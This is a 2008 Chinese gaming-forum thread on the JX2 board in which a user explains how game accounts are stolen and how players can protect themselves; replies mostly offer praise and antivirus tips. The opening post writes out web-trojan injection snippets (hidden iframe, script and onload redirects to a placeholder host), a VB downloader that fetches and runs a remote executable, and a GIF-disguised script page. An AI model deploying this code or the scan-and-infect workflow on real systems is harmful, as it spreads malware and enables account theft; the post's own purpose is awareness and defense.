剑侠情缘网络版贰

标题: 盗号基本办法原理 [打印本页]

作者: 3854315635 时间: 2008-7-15 09:07
标题: 盗号基本办法原理
经常可以在世界频道看见骂盗号者的，请你们看完这篇文章以后就不要在做那么低级的事了，因为在我看来，自己的号被盗了，那是奇耻大辱，我可没脸去大喊大叫！也有朋友一被盗号就骂金山，说句公道话，金山公司的杀毒软件确实不行，任何被杀的小马拿到我手上都能轻松的过金山和瑞星的杀毒软件，目前也就卡巴有些难度，现在大家的电脑配置应该都不低了吧，建议大家安装卡巴斯基（外号：卡死你，内存在512以下的朋友就别安装了，真能卡死你）装上卡巴斯基，在配合360安全卫士的“清理恶评插件”功能，平时在注意一下基本安全（下面给大家讲），这样你的号能保证在95%不丢！
目前市场上流行的木马一般是：伯乐大小姐悍马这几个工作室的马，大小姐工作室主要开发梦幻西游的马，悍马主要垄断魔兽，伯乐是什么马都在搞，这几个写马工作室都是比较有信誉的，而且木马随游戏更新而更新，价格也都差不多2000-4000，很多盗号工作室都用他们的马！
上面说了网络里流传的木马名字，下面我们在来说一下盗号者是如何利用他们提供的利刃来进行盗号的！（由于很多朋友没有这方面的知识，我就讲得通俗一些，内行朋友就别BB了）接着说，有了木马是远远不够的，还需要网马的配合，木马才能发挥最大效率来进行盗号，现在市场上的网马都是组合的，目前比较出名的是终结者和暗黑的网马，简单给大家讲一下网马是通过什么来执行的，网马一般是根据系统漏洞和第3方软件执行漏洞来让木马隐藏下载并且运行，这样就达到了种马的效果，这时候就有朋友要问了，到底有那些漏洞，我们该如何防范呢？别急，我会告诉你们的！大家还记得去年的06014漏洞吧，呵呵`非常经典的系统漏洞，一天可以抓上万只鸽子鸡，但是现在比较少了，通过中马率文件的显示，最多的还是第3方软件的中率要高些，一般是RealPlay播放器 Qvod Player（Q播）迅雷下载器另外07004也还行`知道了这些软件有漏洞以后该怎么办，就不需要我说了吧，当然是卸在低版本的，然后安装最新版的嘛`笨笨，所以最基本的安全操作是：打好系统所有的补丁，在卸掉一些不常用的第3方软件，如果要用的请一定安装最新版！
做好上面的事情后，我们在来了解一下盗号工作室是怎么利用木马和网马来盗你的号，一般是通过挂马的方式，有些内行朋友看到这该骂我了，直接说挂站不就行了，还那么多废话，错！为了大家对这方面的知识有更高一层次的认识，所以我要讲的不止是同过挂站来盗号，大家请仔细看清楚了！
第一种方式：通过入侵网站，挂马者可以通过网站后门完全控制别人的整个网站，既然是完全控制，那么就有了写入权限，就可以编辑别人网站的源代码，用处是什么呢！挂弹窗广告，挂远程控制木马，挂盗号木马，挂插件，这些都是可以赚钱的，常用代码如下：
一:框架挂马
<iframe src=http://www.xxx.com/mm.htm(这里是上面说到的网马地址) width=0 height=0></iframe>
二:js文件挂马
<script language=javascript src=vip.js></script> vip.js里的内容和上面的框架的代码雷同
三:body挂马
<body onload="window.location='http://www.xxx.com/mm.htm(这里是上面说到的网马地址)';"></body>
这里只说3种，当然挂马的代码肯定不止这些，但是90%的人挂马都只用这3种，如果你遇到另外那10%，只能说明你命不好，人品太差

挂马者一般为了节约时间，通常会在网站的最上或者最下写上这些代码，所以当你发现电脑突然卡起来了，或者CPU突然100%，并且进程多了一些CMD.EXE mm.exe muma.exe类的进程，那么你就得马上关闭游戏，断开网线，然后杀毒，为什么要断开网线呢，因为刚中马，谁也不知道对方挂的是什么马，万一是灰鸽子类的远程控制软件呢，那你杀1万次也没用！所以断开网络是必须的！

第二种方式：通过入侵服务器，然后用服务器的arp功能来进行整个IP段的嗅探和欺诈，入侵服务器的方法就太多了`举些常用的例子吧！1433 3372 42 135 等端口的溢出可以直接得到服务器的CMD权限，有了这个权限你就可以建立帐号，开3389，然后上去乱整了`呵呵！也可以通过网站后门来进行提权，一般都是用SU或者SQL的SA或者ROOT来进行提权，现在有朋友要问了，在别人服务器上挂木马，关我什么事，我又不去他服务器上的网站，错！这样想是不对的！比如服务器的IP是212.125.1.100，那么这个IP段之间就有255个服务器212.125.1.1-212.125.1.255，如果这255个服务器都在同一个交换机上，并且没有很好的arp防火墙，那么入侵其中一个服务器就等于入侵了整个IP段的服务器了，目前最好用的嗅探工具是scan，有汉化版！

第三种方式：通过网吧局域网共享来传播木马，这方法不需要用到网马！直接可以种EXE程序，在网吧上网丢号的朋友看仔细了，由于一些菜鸟网管到现在还在使用文件共享而没有使用印象文件的猪脑壳导致很多朋友在网吧丢号，盗号者一般会使用阿D网络工具包类的黑客软件来进行共享开启和传输，就这样不知不觉的你就中马了````汗`真可怜！

第四种方式：135溢出，当然也可以是137 138 139 445，这端口不重要，随便扫都行，重要的是这些端口一般是家用电脑默认开启的端口，只要扫出来存活主机就行`因为135溢出主要针对的是administrator用户名的密码为弱口令，什么是弱口令呢？比如什么123456 654321 888888 000000这类的傻瓜密码就为弱口令了，当然也包括自动登陆，不设置密码的用户，由于现在国内用户大多网络安全意识比较差，60%以上的人是不去设置密码和改变用户组的，鉴于很多朋友是在家上网并且丢号的，这里我就讲详细一点，135溢出的操作流程是：1大批量扫描135端口，2过滤弱口令，3批量开启弱口令的23端口，4批量上传并且运行木马，这样看就应该从什么地方来做自己的安全了吧？首先更改登陆密码，然后关闭23端口，23端口可以直接在服务器里禁用，当然你也可以彻底删除telnet的组建，反正你又不用这东西`

顺便说一下一些黑客技术初学者的常用伎俩，因为他们没那技术如入侵，所以只有搞写下三滥的招数，反正这些招数我是看不上眼的，但是这些招数一样有人去中啊，我就郁闷了，为什么你们会那么笨，喜欢看毛片的朋友注意了！！现在很多A站被封，大家只能通过一些共享软件来满足你们的兽欲，比如什么PP点点通驴子 BT 类的软件平台来实现用户之间的相互传输，很多小菜鸟喜欢找一个小一点的影片，比如3M 4M的，名字取骚一点就有人去下载了`而且下载的人还不少呢``哎`，虽然这些共享平台可以过滤捆绑，但是过滤不了插代码的，比如RM格式的影片可以插入时间来定时弹窗，看到最精彩的时候弹个网页出来`我想你是没空去管的`如果弹出来的这个网页是挂的网马，那你就中了，WMV类的格式可以插入证书，一打开文件，就提示你要下载证书才能观看，要你忍不住要看`一点下载，那么马上也是弹一个网页出来，哎`````真郁闷，看片都要我教！！！！

爱到处下载外挂的朋友看仔细了！现在大部分的外挂都是VB或者delhpi类编程环境画出来的假外挂，其实里面的代码很简单，就是一个下载者的代码，自动下载指定的EXE程序，并且运行！
来看一下VB的代码：
Private Sub Form_Load()
URLDownloadToFile 0, "http://www.xxx.com/jx.exe", "C:\jx.exe", 0, 0
Sleep 5000 '单位是毫秒，下载完毕后的5000毫秒自动运行
ShellExecute 0, vbNullString, "C:\jx.exe", vbNullString, vbNullString, vbNormalFocus
End
End Sub
看见了么，就是那么简单，这是很简单的，如果在多加一些隐藏功能，你是发现不了的，所以大家老实的玩游戏吧，别JB乱整了，吃亏的是自己！

在说一下在新手村每天喊话不累的哪个垃圾是如何盗号的，他利用的是QQ空间自定义模块的功能开实现挂马，有些自认为很会搞空间的朋友这时候会鄙视我了`QQ空间是不能插HTM的页面的`呵呵，是不能，但是能插图片啊`，首先找一个免费的IIS空间，上传一个图片木马，图片木马的内容为：
GIF89a
<html><body>
<STYLE TYPE="text/css">textarea,input,body,select,pre,td,th{font-family: "宋体";font-size: 9pt}.button {border-width: 1px} .text {border:solid 1px}</STYLE>
下面就是HTM的代码了，太长，不写了
这样就可以实现用GIF格式的图片来执行网页的脚本了！！！！大家记住了！！

作者: 乄緣┋蓝星 时间: 2008-7-15 09:09
[jx23] 沙发座着慢慢看～

作者: 沈凯鹏 时间: 2008-7-15 09:14

好贴好贴

作者: 3854315635 时间: 2008-7-15 09:15
标题: 在删掉就证明你们是一伙的
置定最好顺便说一下是转载的

本人103-1 调皮捣蛋小娇女盗我号的可以和我联系我的系统防护全关闭了[jx01] [jx01]

作者: 蓝怪ā 时间: 2008-7-15 09:20
牛人！顶你！这个帖子可以让很多乱骂别人盗号的白痴学习下了！

作者: しovの书童 时间: 2008-7-15 09:38
这个帖子得顶

作者: しovの书童 时间: 2008-7-15 09:44
用用360配合卡吧
给系统打补丁特别是第3方软件

作者: しovの书童 时间: 2008-7-15 09:47
就第3种方式网吧盗号
现在大都是网吧系统补丁没打上基本中的都是网马

作者: 蓝怪ā 时间: 2008-7-15 10:01
现在专业盗号的都去网吧种马！几个人通宵就可以在大多数机器上种上马！可以绕过还原卡！[jx29] [jx29] [jx29] [jx29] 网吧盗号和黄色网站盗号应该是盗号的最主要场所！而且现在木马变种加壳更新速度太快！所以最好用“启发式”杀毒软件！因为这种杀毒软件无论你病毒木马怎么变！他们行为目的是固定的！这类型的杀软很容易就识别，而且占用资源很少！又不需要经常更新病毒库！[jx27] [jx27]

作者: o猥琐兔o 时间: 2008-7-15 10:05
[jx17] [jx17] [jx17] 不怎么懂

作者: 胭脂の貓. 时间: 2008-7-15 10:24
虽然没完全看懂，不过还是要顶的[jx29]

作者: 侬也凉凉去 时间: 2008-7-15 10:39
外挂是剑侠2被盗很大的原因

用百度搜索到的头几个DBT都是假官网，是给钱百度后，百度把他们置顶搜索结果前几位的
很大一部分玩剑侠2的就是这样下拉假DBT而中木马，回头还大骂DBT如何如何盗号《真的DBT盗不盗我不敢肯定，这个肯定是绝对盗的》
还有一些别的外挂，干脆就是专门盗号的

作者: 蓝怪ā 时间: 2008-7-15 11:20

原帖由 侬也凉凉去 于 2008-7-15 10:39 发表
外挂是剑侠2被盗很大的原因

用百度搜索到的头几个DBT都是假官网，是给钱百度后，百度把他们置顶搜索结果前几位的
很大一部分玩剑侠2的就是这样下拉假DBT而中木马，回头还大骂DBT如何如何盗号《真的DBT盗不盗我不 ...

[jx29] [jx29] [jx29] [jx29] [jx29] [jx29] [jx29] 顶！！！！！！！！！！！！

作者: 剑圣邱1 时间: 2008-7-15 11:46
标题: 高科技的东西,俺们不懂
防马不如自保,装备全不能交易的,冲卡马上花完[jx27] ,被盗给人家看看[jx01]

作者: tekken3 时间: 2008-7-15 11:47
我日，还没注意就被加亮了，呵呵，总结一下，就是装好杀毒软件，不要看黄色网站，定期，，杀毒！

作者: 花落左岸 时间: 2008-7-15 11:50
看不懂，但还是顶下[jx20] [jx20]

作者: 2-1收号 时间: 2008-7-15 11:51
[jx25] 我挂机的机器从来不装杀毒软件
什么网站都敢上
[jx29] 因为我用的苹果机~~~~~~~~~~~~~~~~~~~~~~~~~~~
[jx01] 没几个人为苹果机写马吧~~~~~~~~~~~~~~~~~~

作者: 张牙舞爪小宝 时间: 2008-7-15 11:51
[jx24] [jx24] [jx24] [jx24] 游戏电脑绝对不装那些第三方软件

作者: 天涯怅红颜 时间: 2008-7-15 12:45
[jx30] 卡巴斯基占资源？卡巴2009在立体防御的基础上占的资源紧紧比NOD32多一点而已

作者: 猫博 时间: 2008-7-15 12:49
提示: 作者被禁止或删除内容自动屏蔽

作者: 寂寞无聊的厉害 时间: 2008-7-15 12:56
好文应该顶...[jx02] [jx02]

作者: 宠儿あ雨林 时间: 2008-7-15 13:00
[jx15] [jx15] [jx15]

作者: 我不喜欢打架 时间: 2008-7-15 13:08
[jx15] [jx15] [jx15] [jx15]

作者: 晕呼呼呼呼 时间: 2008-7-15 13:12
[jx28] [jx28] [jx28] 看的好累给盗了也还是可以骂骂解气嘛

作者: 一年又一年哎 时间: 2008-7-15 13:29
[jx27] [jx27]

作者: liujimy 时间: 2008-7-15 13:39
又见103的[jx27]

作者: 无限相思 时间: 2008-7-15 14:00
[jx20] [jx20] [jx20] [jx20]

作者: 秦岳扬 时间: 2008-7-15 14:14
我从来不去网吧,我号从来没被盗过[jx27]

作者: 貌似淡定 时间: 2008-7-15 14:26
[jx30] [jx30] [jx30] 看不懂先收藏起来慢慢看....

作者: 深信 时间: 2008-7-15 14:43
长见识了 .....................

作者: 漫漫呛烟 时间: 2008-7-15 14:45
恩　我就用卡把死几　　+３６０

顶ＬＺ

作者: 樱桃甜甜 时间: 2008-7-15 14:47
虽然不懂LZ的专业术语
但我一直老老实实在使用卡巴斯进和360
鄙视卡巴公司
正版的只能装一台电脑[jx30] [jx30] [jx30]

作者: 冷之心心 时间: 2008-7-15 14:59
[jx27] [jx27] [jx27]

作者: 笑看＆晨曦 时间: 2008-7-15 15:02

先收藏着战场完在继续认真看

作者: 思想太监 时间: 2008-7-15 15:07
[jx02] [jx02] 就是~免得被盗了今天喊是大补贴明天喊是金山

作者: 2-1收号 时间: 2008-7-15 15:11
[jx25]我们单位买了100用户的卡巴但是只装了50多!!![jx01] 有MM要吗 PM哈~~~~[jx13] 6.0的安全空间

作者: 剑侠论坛专用 时间: 2008-7-15 15:21
好帖

作者: しovの书童 时间: 2008-7-15 15:55

原帖由 2-1收号 于 2008-7-15 15:11 发表
[jx25]我们单位买了100用户的卡巴但是只装了50多!!![jx01] 有MM要吗 PM哈~~~~[jx13] 6.0的安全空间

去专门的论坛下个就是
我的都是同学提供的

作者: 往日重现 时间: 2008-7-15 16:20

原帖由 2-1收号 于 2008-7-15 11:51 发表
[jx25] 我挂机的机器从来不装杀毒软件
什么网站都敢上
[jx29] 因为我用的苹果机~~~~~~~~~~~~~~~~~~~~~~~~~~~
[jx01] 没几个人为苹果机写马吧~~~~~~~~~~~~~~~~~~

肥肉又在吹。。。。。。。。。。

作者: 我是小弓 时间: 2008-7-15 16:27
好复杂.........不太懂

作者: 中秋夜收台湾 时间: 2008-7-15 16:50
[jx27] [jx27] [jx27]

作者: 葬花ご祭 时间: 2008-7-15 17:06
....................

作者: hehaiyang_111 时间: 2008-7-15 17:33
提示: 作者被禁止或删除内容自动屏蔽

作者: 多少度法师 时间: 2008-7-15 17:44
标题: 求21区后裔，嫦娥，试炼果子！枪镇派!
不错啊
我就用360，不上颜色网站

作者: *ｍ臉紅紅ヽ 时间: 2008-7-15 17:49
[jx27] 精华.. 该顶

作者: 汤菜菜的菜摊 时间: 2008-7-15 18:03
[jx17] [jx17] [jx17] [jx17] [jx17]

作者: 桃~飘雨 时间: 2008-7-15 18:05
[jx30] [jx30] 好贴，虽然看不太懂，收起来慢慢看

作者: 3854315635 时间: 2008-7-15 22:31
标题: 盗号办法--1
被盗号的玩家在游戏里有所谓朋友以种种原因让你上他的号等你上了以后他在上就会显示出你的IP地址他在用扫描仪查出你的系统漏洞然后顺理成章的就可以蚕食你

奉劝把系统补丁打全

作者: 娃娃得爱 时间: 2008-8-9 02:08
[jx09] [jx09] [jx09] 好貼。

作者: ︷＂霜、﹖ 时间: 2008-8-9 02:17

先回在看!

作者: 游侠以后 时间: 2008-8-9 03:06

原帖由 3854315635 于 2008-7-15 09:07 发表
经常可以在世界频道看见骂盗号者的，请你们看完这篇文章以后就不要在做那么低级的事了，因为在我看来，自己的号被盗了，那是奇耻大辱，我可没脸去大喊大叫！也有朋友一被盗号就骂金山，说句公道话，金山公司的杀毒软 ...

第一段话说的很是经典...
我非常赞成.
与其号丢了哭天喊地骂金山,不如找找自己的问题.

现在穿还原已经是一种时尚.

作者: 佳儿づ若梦 时间: 2008-8-9 03:32
[jx20] 看完了..虽然不大懂..但是好贴要顶的

作者: loojk 时间: 2008-8-9 08:59
提示: 作者被禁止或删除内容自动屏蔽

作者: 想看其他版块只能注册 时间: 2008-8-9 09:13
[jx23] [jx23] [jx23] [jx23] [jx23] [jx23]

作者: 小ぁ丫头 时间: 2008-8-9 09:31
[jx19] [jx19] [jx19] [jx19]

作者: 狂抓胸毛 时间: 2008-8-26 16:04
很好的帖啊
涨见识了

作者: べ√傷心寳寳 时间: 2008-8-26 16:07
好多啊慢慢看`````````````

作者: 丨龙丨灬正言不讳 时间: 2008-8-26 16:16

原帖由 蓝怪ā 于 2008-7-15 09:20 发表
牛人！顶你！这个帖子可以让很多乱骂别人盗号的白痴学习下了！

你难道不是白痴就你聪明你以为每个人是学计算机的吗？

作者: 迷亼尐樣ル.燕子 时间: 2008-8-26 16:20
呵呵``上了一课``

作者: 子巺 时间: 2008-8-26 16:25
太牛了，这个帖子要顶，我看的很仔细

作者: 北京的一夜 时间: 2008-9-8 11:14
好看，就是学不会。笨

作者: 好工期 时间: 2008-9-8 11:14
[jx15] [jx15] [jx15]

作者: 原来游戏也可以这么做的 时间: 2008-9-8 11:19

原帖由 3854315635 于 2008-7-15 09:15 发表
置定最好顺便说一下是转载的

本人103-1 调皮捣蛋小娇女盗我号的可以和我联系我的系统防护全关闭了[jx01] [jx01]

台长，半年不见，存J又涨多少？
另：还俺买大树的钱来！！！[jx29] [jx29] [jx29]

作者: 暮雪翩翩 时间: 2008-9-8 13:48

水水更健康
大王派我来灌水

作者: 冷血催命 时间: 2008-9-9 12:21
[jx01] [jx01] [jx01] [jx01] [jx01] [jx01] [jx01]

作者: 为时未晚 时间: 2008-9-9 12:27
我一直用卡巴斯基（免费的哟，网上下授权）配合360安全卫士，[jx02] [jx02]

作者: 凌小鱼 时间: 2008-9-9 12:37
～见识了[jx23]

作者: 疯狂的少妇 时间: 2008-9-12 18:21
标题: 好
哈哈哈,太牛了,你也是个大黑客

作者: 燃情岁月. 时间: 2008-9-12 18:36

原帖由 天涯怅红颜 于 2008-7-15 12:45 发表
[jx30] 卡巴斯基占资源？卡巴2009在立体防御的基础上占的资源紧紧比NOD32多一点而已

诺顿还不一样，耗CPU厉害得很

作者: 月影战士 时间: 2008-11-10 13:21
DDDDDDDDDDDDDDDDDD

作者: yun90521 时间: 2008-11-10 16:18
[jx27] [jx27] [jx27] 高手啊. 支持个

作者: 蝶若舞飞 时间: 2008-11-10 16:24
[jx04] 那在网吧丢号怎么防范啊？而且，我实在是看不懂这些。。。

作者: 123124561 时间: 2008-11-10 16:30
[jx17] 不太懂呀[jx17]

作者: 黄玉龙 时间: 2008-11-10 16:48
[jx10] [jx10] 顶起下

作者: 月亮兔 时间: 2008-11-10 17:13

原帖由 蝶若舞飞 于 2008-11-10 16:24 发表
[jx04] 那在网吧丢号怎么防范啊？而且，我实在是看不懂这些。。。

登陆游戏后立马用绑定邮箱或手机修改密码，这样就算盗了也是个过期无效的密码[jx18]

作者: 罒淺笑嫣然﹏ 时间: 2008-11-10 20:09

兔子

作者: 带佛的道士好打 时间: 2008-11-11 03:25
[jx15] 支持高手发技术帖子避免玩家被盗

作者: 夜╉残影 时间: 2008-11-11 04:03
好长好长好长好长啊。。。[jx17]

作者: 純粨涩灬 时间: 2008-11-11 08:19
[jx23] [jx23] [jx23]

作者: erfo 时间: 2008-11-11 08:31
[jx01] [jx01] 顶

作者: 取个B名混论坛 时间: 2008-11-11 08:51
貌似楼主说的有道理[jx17] [jx17] [jx17] [jx17]

作者: eerterte 时间: 2008-11-11 18:04
标题: 路过
[jx02] [jx23] [jx25]

欢迎光临剑侠情缘网络版贰 (https://jx2.bbs.xoyo.com/)